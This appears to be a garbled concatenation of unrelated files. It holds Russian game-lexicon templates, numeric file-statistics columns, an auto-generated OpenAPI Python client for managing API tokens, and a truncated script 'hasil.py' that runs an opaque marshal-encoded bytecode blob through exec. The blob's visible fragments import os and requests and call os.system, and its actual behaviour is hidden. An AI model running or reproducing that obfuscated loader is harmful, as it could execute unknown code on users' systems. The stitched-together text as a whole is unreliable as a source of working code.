('JOB_DIARY_PERSON_PLACE_FREEDOM_POSITIVE_FRIENDS', 620066, 'Дневник: работа выполнена мастером успешно, эффект: «свобода», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «свобода», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_POSITIVE_ENEMIES', 620067, 'Дневник: работа выполнена мастером успешно, эффект: «свобода», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «свобода», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_NEGATIVE_FRIENDS', 620068, 'Дневник: работа выполнена мастером не успешно, эффект: «свобода», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «свобода», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_FREEDOM_NEGATIVE_ENEMIES', 620069, 'Дневник: работа выполнена мастером не успешно, эффект: «свобода», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «свобода», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_POSITIVE_FRIENDS', 620070, 'Дневник: работа выполнена мастером успешно, эффект: «стабильность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «стабильность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_POSITIVE_ENEMIES', 620071, 'Дневник: работа выполнена мастером успешно, эффект: «стабильность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «стабильность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_NEGATIVE_FRIENDS', 620072, 'Дневник: работа выполнена мастером не успешно, эффект: «стабильность», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «стабильность», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_STABILITY_NEGATIVE_ENEMIES', 620073, 'Дневник: работа выполнена мастером не успешно, эффект: «стабильность», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «стабильность», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_POSITIVE_FRIENDS', 620074, 'Дневник: работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.COINS], 'hero#N +coins#G'),
('JOB_DIARY_PERSON_HERO_MONEY_POSITIVE_ENEMIES', 620075, 'Дневник: работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «золото ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_NEGATIVE_FRIENDS', 620076, 'Дневник: работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_MONEY_NEGATIVE_ENEMIES', 620077, 'Дневник: работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «золото ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.COINS], 'hero#N +coins#G'),
('JOB_DIARY_PERSON_HERO_ARTIFACT_POSITIVE_FRIENDS', 620078, 'Дневник: работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.ARTIFACT], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_POSITIVE_ENEMIES', 620079, 'Дневник: работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «артефакт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_NEGATIVE_FRIENDS', 620080, 'Дневник: работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_ARTIFACT_NEGATIVE_ENEMIES', 620081, 'Дневник: работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «артефакт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.ARTIFACT], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_POSITIVE_FRIENDS', 620082, 'Дневник: работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.EXPERIENCE], 'hero#N +experience#EXP'),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_POSITIVE_ENEMIES', 620083, 'Дневник: работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «опыт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_NEGATIVE_FRIENDS', 620084, 'Дневник: работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_EXPERIENCE_NEGATIVE_ENEMIES', 620085, 'Дневник: работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «опыт ближнему кругу», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON, V.EXPERIENCE], 'hero#N +experience#EXP'),
('JOB_DIARY_PERSON_HERO_CARDS_POSITIVE_FRIENDS', 620086, 'Дневник: работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], 'hero#N'),
('JOB_DIARY_PERSON_HERO_CARDS_POSITIVE_ENEMIES', 620087, 'Дневник: работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «карты судьбы», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_CARDS_NEGATIVE_FRIENDS', 620088, 'Дневник: работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_HERO_CARDS_NEGATIVE_ENEMIES', 620089, 'Дневник: работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «карты судьбы», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], 'hero#N'),
('JOB_NAME_PERSON_PLACE_CULTURE', 620091, 'Название: выполняется мастером, эффект: «культура»', relations.LEXICON_GROUP.JOBS,
'Название занятия выполняемого мастером, эффект: «культура»', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_POSITIVE_FRIENDS', 620096, 'Дневник: работа выполнена мастером успешно, эффект: «культура», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «культура», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_POSITIVE_ENEMIES', 620097, 'Дневник: работа выполнена мастером успешно, эффект: «культура», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером успешно, эффект: «культура», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_NEGATIVE_FRIENDS', 620098, 'Дневник: работа выполнена мастером не успешно, эффект: «культура», сообщение для соратников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «культура», сообщение для соратников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
('JOB_DIARY_PERSON_PLACE_CULTURE_NEGATIVE_ENEMIES', 620099, 'Дневник: работа выполнена мастером не успешно, эффект: «культура», сообщение для противников', relations.LEXICON_GROUP.JOBS,
'Работа выполнена мастером не успешно, эффект: «культура», сообщение для противников', [V.DATE, V.TIME, V.HERO, V.PLACE, V.PERSON], None),
]
| 145.876106
| 204
| 0.764438
| 2,347
| 16,484
| 5.312314
| 0.050277
| 0.056144
| 0.147578
| 0.100257
| 0.939766
| 0.907684
| 0.894289
| 0.887793
| 0.887793
| 0.887793
| 0
| 0.02058
| 0.115688
| 16,484
| 112
| 205
| 147.178571
| 0.821019
| 0
| 0
| 0
| 0
| 0
| 0.651338
| 0.132257
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019048
| 0
| 0.019048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc1c8257310ea5fbc7e4a267f1867f6e9c777c55
| 24,551
|
py
|
Python
|
pollination_sdk/api/api_tokens_api.py
|
pollination/python-sdk
|
599e8dbfc6e547c5e18aa903b27c70d7ffef84e5
|
[
"RSA-MD"
] | 2
|
2020-01-30T23:28:59.000Z
|
2020-05-06T16:43:47.000Z
|
pollination_sdk/api/api_tokens_api.py
|
pollination/python-sdk
|
599e8dbfc6e547c5e18aa903b27c70d7ffef84e5
|
[
"RSA-MD"
] | 1
|
2020-10-02T18:00:25.000Z
|
2020-10-02T18:00:25.000Z
|
pollination_sdk/api/api_tokens_api.py
|
pollination/python-sdk
|
599e8dbfc6e547c5e18aa903b27c70d7ffef84e5
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.16.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from pollination_sdk.api_client import ApiClient
from pollination_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class APITokensApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_token(self, api_token_create, **kwargs): # noqa: E501
"""Create a new API token # noqa: E501
Create a new API token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token(api_token_create, async_req=True)
>>> result = thread.get()
:param api_token_create: (required)
:type api_token_create: APITokenCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: APITokenPrivate
"""
kwargs['_return_http_data_only'] = True
return self.create_token_with_http_info(api_token_create, **kwargs) # noqa: E501
def create_token_with_http_info(self, api_token_create, **kwargs): # noqa: E501
"""Create a new API token # noqa: E501
Create a new API token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token_with_http_info(api_token_create, async_req=True)
>>> result = thread.get()
:param api_token_create: (required)
:type api_token_create: APITokenCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(APITokenPrivate, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'api_token_create'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_token" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'api_token_create' is set
if self.api_client.client_side_validation and ('api_token_create' not in local_var_params or # noqa: E501
local_var_params['api_token_create'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `api_token_create` when calling `create_token`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'api_token_create' in local_var_params:
body_params = local_var_params['api_token_create']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/tokens', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APITokenPrivate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_token(self, token_id, **kwargs): # noqa: E501
"""Delete an API Token # noqa: E501
Delete a token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_token(token_id, async_req=True)
>>> result = thread.get()
:param token_id: (required)
:type token_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: object
"""
kwargs['_return_http_data_only'] = True
return self.delete_token_with_http_info(token_id, **kwargs) # noqa: E501
def delete_token_with_http_info(self, token_id, **kwargs): # noqa: E501
"""Delete an API Token # noqa: E501
Delete a token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_token_with_http_info(token_id, async_req=True)
>>> result = thread.get()
:param token_id: (required)
:type token_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(object, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'token_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_token" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'token_id' is set
if self.api_client.client_side_validation and ('token_id' not in local_var_params or # noqa: E501
local_var_params['token_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `token_id` when calling `delete_token`") # noqa: E501
collection_formats = {}
path_params = {}
if 'token_id' in local_var_params:
path_params['token_id'] = local_var_params['token_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/tokens/{token_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_tokens(self, **kwargs): # noqa: E501
"""List user API tokens # noqa: E501
List API tokens for the authenticated user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tokens(async_req=True)
>>> result = thread.get()
:param page: Page number starting from 1
:type page: int
:param per_page: Number of items per page
:type per_page: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: APITokenList
"""
kwargs['_return_http_data_only'] = True
return self.list_tokens_with_http_info(**kwargs) # noqa: E501
def list_tokens_with_http_info(self, **kwargs): # noqa: E501
"""List user API tokens # noqa: E501
List API tokens for the authenticated user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tokens_with_http_info(async_req=True)
>>> result = thread.get()
:param page: Page number starting from 1
:type page: int
:param per_page: Number of items per page
:type per_page: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(APITokenList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'page',
'per_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tokens" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `list_tokens`, must be a value greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'per_page' in local_var_params and local_var_params['per_page'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `per_page` when calling `list_tokens`, must be a value less than or equal to `100`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'per_page' in local_var_params and local_var_params['per_page'] is not None: # noqa: E501
query_params.append(('per-page', local_var_params['per_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/tokens', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APITokenList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def regenerate_token(self, token_id, **kwargs): # noqa: E501
"""Regenerate an API token # noqa: E501
Regenerate a token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.regenerate_token(token_id, async_req=True)
>>> result = thread.get()
:param token_id: (required)
:type token_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: APITokenPrivate
"""
kwargs['_return_http_data_only'] = True
return self.regenerate_token_with_http_info(token_id, **kwargs) # noqa: E501
def regenerate_token_with_http_info(self, token_id, **kwargs): # noqa: E501
"""Regenerate an API token # noqa: E501
Regenerate a token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.regenerate_token_with_http_info(token_id, async_req=True)
>>> result = thread.get()
:param token_id: (required)
:type token_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(APITokenPrivate, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'token_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method regenerate_token" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'token_id' is set
if self.api_client.client_side_validation and ('token_id' not in local_var_params or # noqa: E501
local_var_params['token_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `token_id` when calling `regenerate_token`") # noqa: E501
collection_formats = {}
path_params = {}
if 'token_id' in local_var_params:
path_params['token_id'] = local_var_params['token_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/tokens/{token_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APITokenPrivate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 42.771777
| 159
| 0.592196
| 2,756
| 24,551
| 5.017779
| 0.075472
| 0.038181
| 0.058717
| 0.031239
| 0.926676
| 0.91648
| 0.910406
| 0.908164
| 0.880541
| 0.870273
| 0
| 0.014062
| 0.336687
| 24,551
| 573
| 160
| 42.846422
| 0.835124
| 0.479451
| 0
| 0.695473
| 1
| 0.00823
| 0.181511
| 0.024092
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.020576
| 0
| 0.09465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc28e9d8b713289932b44c399e6fade783836d6d
| 63,872
|
py
|
Python
|
hasil.py
|
Bangsat-XD/BROKEN
|
0cbded3d5aa45fdd1c56cea05192f3428b90e442
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
hasil.py
|
Bangsat-XD/BROKEN
|
0cbded3d5aa45fdd1c56cea05192f3428b90e442
|
[
"Apache-2.0"
] | null | null | null |
hasil.py
|
Bangsat-XD/BROKEN
|
0cbded3d5aa45fdd1c56cea05192f3428b90e442
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#Compiled By ☆ RAKA ☆ ™︻®╤───────═◍➤
#Instagram raka_andrian27
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00@\x00\x00\x00sE\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00y\x10\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00Wn\x1e\x00\x04e\x02\x00k\n\x00r<\x00\x01\x01\x01e\x00\x00j\x03\x00d\x02\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00Wn\x1e\x00\x04e\x02\x00k\n\x00rm\x00\x01\x01\x01e\x00\x00j\x03\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x04\x00l\x0b\x00m\x0c\x00Z\x0c\x00\x01d\x00\x00d\x05\x00l\x04\x00m\r\x00Z\x0e\x00\x01d\x00\x00d\x06\x00l\x0f\x00m\x0f\x00Z\x0f\x00\x01d\x00\x00d\x07\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x08\x00a\x11\x00g\x00\x00Z\x12\x00g\x00\x00Z\x13\x00g\x00\x00Z\x14\x00e\x0f\x00j\x15\x00\x83\x00\x00Z\x16\x00e\x16\x00j\x17\x00Z\x18\x00d\t\x00d\n\x00d\x0b\x00d\x0c\x00d\r\x00d\x0e\x00d\x0f\x00d\x10\x00d\x11\x00d\x12\x00d\x13\x00d\x14\x00g\x0c\x00Z\x19\x00y0\x00e\x18\x00d\x08\x00k\x00\x00s\x80\x01e\x18\x00d\x15\x00k\x04\x00r\x8a\x01e\x1a\x00\x83\x00\x00\x01n\x00\x00e\x18\x00d\x16\x00\x18Z\x1b\x00Wn\x18\x00\x04e\x1c\x00k\n\x00r\xaf\x01\x01\x01\x01e\x